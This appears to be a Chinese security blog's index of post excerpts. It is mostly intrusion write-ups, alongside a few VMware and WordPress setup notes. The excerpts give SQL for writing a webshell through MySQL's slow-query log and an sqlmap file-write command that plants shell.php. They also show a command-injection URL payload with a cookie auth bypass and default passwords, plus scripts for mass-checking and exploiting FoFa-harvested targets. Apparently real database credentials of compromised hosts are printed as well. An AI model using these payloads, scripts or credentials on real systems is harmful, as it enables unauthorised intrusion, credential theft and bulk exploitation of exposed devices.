mysql写入php一句话
漏洞 目录浏览,phpinfo, phpmyadmin 写shell 目标存在phpmyadmin,又因为目录浏览,看到网站备份的压缩文件,下载以后查找数据库用户密码,找到 root:fhcloud_2018 登录phpmyadmin, getshell 想通过写入文件获得webshell,但是查询到导出路径为NULL,遂想通过日志来getshell 通过慢查询日志getshell,开启慢查询日志记录,通过phpinfo提供路径,进行log查询写入 show variables like '%slow_query_log%'; 开启慢查询日志记录 set GLOBAL slow_query_log=on; 通过phpinfo得知,web目录为C:\phpStudy\WWW\log.php,所以设置日志路径 set GLOBAL slow_query_log_file='C:\\phpStudy\\WWW\\log2.php'; 基于日志写shell #( outfile被禁止,或者写入文件被拦截,没写权限...
安全相关站点
名称 地址 狼组安全团队公开知识库 https://wiki.wgpsec.org/knowledge/
VMware 因为系统更新 启动提示没有GCC
linux系统因为更新内核 导致vmware提示找不到 gcc如果系统有提示重新安装vmmon vmnet 点击重新安装即可 方法1 去https://github.com/mkubecek/vmware-host-modules找对应vm版本的tar.gz,然后安装 First method (build and install): wget https://github.com/mkubecek/vmware-host-modules/archive/workstation-14.1.1.tar.gztar -xzf workstation-14.1.1.tar.gzcd vmware-host-modules-workstation-14.1.1makemake install 方法2 Second method (replace original tarballs): wget https://github.com/mkubecek/vmware-host-modules/archive/workstation-14.1.1.tar.gztar -xzf...
目录浏览致域沦陷
目录浏览引发的血案 漏洞 目录浏览 phpinfo.php mysql密码泄漏 phpmyadmin 目录泄漏,到处查看文件,其中一个配置文件里面找到了一个mysql用户及密码 http://xxxx:8880/inc/func/mysql.inc $conn_local=db_connect('localhost','nik','niknik','cugaet'); phpmyadmin 能登录, http://xxxx:8880/phpmyadmin 登录以后发现为dba,i结合phpinfo泄漏的路径可以直接写shell,顺便查看root密码02061978 sqlmap -d mysql://nik:niknik@xxxx:3306/mysql --file-write=/root/webshell/shell.php --file-dest=C:/xampp/htdocs/shell.php 菜刀链接以后开始信息收集 找到了mssql...
iTop
1、弱密码2、目录浏览访问站点,随手打个admin,进入 getshell网站环境为php,登录以后,发现管理工具里面有个 “编辑配置文件”,可以对配置文件进行编辑,本来打算直接写个一句话到配置文件保存,但是保存不了,后来末尾添加个phpinfo()竟然直接执行了,于是乎,我想使用php写文件到目录看看,bingo, 执行以后会提示文件大小因为存在目录浏览,所以可以直接看到新建的文件,然后蚁剑访问 查看权限 system 提权都i免了,查看同网段ip 接下来进行密码搜集和内网拓展tasklist 没发现杀毒软件,运气好上传msf执行,收到反弹shell,getuid 是sysytem,hashdump导出hash,load kiwi 查看明文,为空,把hash拿去破解,无果 arp 扫描主机run arp_scanner -r 172.x.x.1/24待续
FoFa Spider脚本
获取FoFa10000条数据爬虫脚本 下面的脚本可能因为服务端变更,会有报错, 推荐使用 https://github.com/wgpsec/fofa_viewer.git fofa-spider.sh 用法:字符串为要搜索的字符串,无须base64。保存文件名,会自动创建文件夹并存放三个文件,分别为搜索记录,ip文件,ip-port文件页前数据,只能1000页以内,默认获取ip时间为每条1秒,可以修改sleep等待时间, #!/bin/bash#设定cookies#read -p "fofapro_ars_sessions:" fofapro_ars_sessionfofapro_ars_session="xxxxxxxxxxxxxxxxxxxxx"#获取搜索字符串,并对字符串进行base64echo -e "\033[33m 搜索的字符串: \033[0m"read -p "" searchsearch_base64=`echo -e "$search\c" |...
diagnose rce
1.命令注入RCE 漏洞地址 cgimodule=net_diagnose&diagnose_type=0&domain=%7C+COMMAND” 2.认证绕过 cookie伪造 name=admin domain=$random language=0 sessionid=0 path= 3.默认密码 ieee802.11 admin 123456 check.sh 对fofa获取的ip进行针对性成活检测 用法 ./check.sh checkfile 文件中每行一个ip,格式为http://ip v1.sh 对文本中的目标进行rce检测,并生成rce-ok rce-no 和notfound三个文件 用法 ./v1.sh 状态200文件,文件中每行一个ip,格式为http://ip 对v1.sh处理后,从rce-ok提取的ip进行分类,分为mips,i686,x86_64 ,并为执行特定payload做准备用法 ./exp.sh...
Mysql创建wordpress数据库并安装wordpress
mysql创建一个wordpress使用的用户,数据库,并赋予权限的命令 创建用户 create user wordpress@localhost identified by '123456'; 创建数据库 create database wordpress; 赋予用户数据库权限 grant all on wordpress.* to 'wordpress'@'localhost' with grant option; 安装 wp-content 给予 写入权限,上传图片写入此目录
WordPress 使用固定链接404错误
环境 wordpress + apache2 +mysql 一、开启apache2的重写规则sudo a2enmode rewrite 或者,也可以通过软连接启用 Mod_rewrite 模块(apache默认是加载了的,进入目录执行 ll 可查看)。两者二选一。用指令操作就是: sudo ln -s /etc/apache2/mods-available/rewrite.load /etc/apache2/mods-enabled/rewrite.load 2、打开apache2配置文件 vim /etc/apache2/apache2.conf #/var/www/修改为wordpress所在目录 Options Indexes FollowSymLinks AllowOverride None #None改为ALL不然会apache会忽略wordpress目录中的.htaccess文件 Require all granted 二、wordpress目录添加.htaccess文件RewriteEngine OnRewriteBase...



